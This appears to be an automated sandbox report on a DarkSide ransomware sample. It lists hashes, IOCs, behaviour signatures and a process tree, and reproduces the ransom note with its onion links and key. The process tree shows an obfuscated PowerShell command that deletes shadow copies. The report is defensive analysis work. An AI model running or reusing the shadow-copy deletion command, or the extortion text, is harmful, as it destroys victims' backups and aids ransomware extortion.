9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297

General
Target

9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe

Filesize

17KB

Completed

28-08-2020 18:35

Score
10 /10
MD5

f87a2e1c3d148a67eaeb696b1ab69133

SHA1

d1dfe82775c1d698dd7861d6dfa1352a74551d35

SHA256

9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297

Malware Config

Extracted

Path C:\\README.c3f722bf.TXT
Family darkside
Ransom Note
----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures 7

Filter: none

Collection
Credential Access
Defense Evasion
Persistence
  • DarkSide

    Description

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    Tags

  • Modifies extensions of user files
    9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Tags

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Users\Admin\Pictures\RegisterMerge.png.c3f722bf9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    File renamedC:\Users\Admin\Pictures\SplitInstall.tif => C:\Users\Admin\Pictures\SplitInstall.tif.c3f722bf9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    File opened for modificationC:\Users\Admin\Pictures\SplitInstall.tif.c3f722bf9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    File renamedC:\Users\Admin\Pictures\RegisterMerge.png => C:\Users\Admin\Pictures\RegisterMerge.png.c3f722bf9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Modifies service
    vssvc.exe

    Tags

    TTPs

    Modify RegistryModify Existing Service

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writervssvc.exe
    Key created\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writervssvc.exe
    Key created\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}vssvc.exe
    Key created\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writervssvc.exe
    Key created\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writervssvc.exe
  • Suspicious behavior: EnumeratesProcesses
    9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exepowershell.exe

    Reported IOCs

    pidprocess
    14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    1920powershell.exe
    1920powershell.exe
    14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
  • Suspicious use of AdjustPrivilegeToken
    9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exepowershell.exevssvc.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeIncreaseQuotaPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeSecurityPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeTakeOwnershipPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeLoadDriverPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeSystemProfilePrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeSystemtimePrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeProfSingleProcessPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeIncBasePriorityPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeCreatePagefilePrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeBackupPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeRestorePrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeShutdownPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeDebugPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeSystemEnvironmentPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeRemoteShutdownPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeUndockPrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeManageVolumePrivilege14969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: 3314969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: 3414969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: 3514969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    Token: SeDebugPrivilege1920powershell.exe
    Token: SeBackupPrivilege944vssvc.exe
    Token: SeRestorePrivilege944vssvc.exe
    Token: SeAuditPrivilege944vssvc.exe
  • Suspicious use of WriteProcessMemory
    9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1496 wrote to memory of 192014969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exepowershell.exe
    PID 1496 wrote to memory of 192014969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exepowershell.exe
    PID 1496 wrote to memory of 192014969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exepowershell.exe
    PID 1496 wrote to memory of 192014969cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exepowershell.exe
Processes 3
  • C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe
    "C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.exe"
    Modifies extensions of user files
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1920
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Modifies service
    Suspicious use of AdjustPrivilegeToken
    PID:944
Network
MITRE ATT&CK Matrix
Collection
Command and Control
    Credential Access
    Defense Evasion
    Discovery
      Execution
        Exfiltration
          Impact
            Initial Access
              Lateral Movement
                Persistence
                Privilege Escalation
                  Replay Monitor
                  00:00 00:00
                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                    Download Submit

                  • memory/1920-0-0x0000000000000000-mapping.dmp

                    Download

                  • memory/1920-1-0x000007FEF6120000-0x000007FEF6B0C000-memory.dmp

                    Download

                  • memory/1920-4-0x0000000001F30000-0x0000000001F31000-memory.dmp

                    Download

                  • memory/1920-5-0x00000000023A0000-0x00000000023A1000-memory.dmp

                    Download

                  • memory/1920-6-0x000000001C680000-0x000000001C681000-memory.dmp

                    Download

                  • memory/1920-7-0x000000001B930000-0x000000001B931000-memory.dmp

                    Download

                  • memory/1920-2-0x0000000002450000-0x0000000002451000-memory.dmp

                    Download

                  • memory/1920-3-0x000000001AD40000-0x000000001AD41000-memory.dmp

                    Download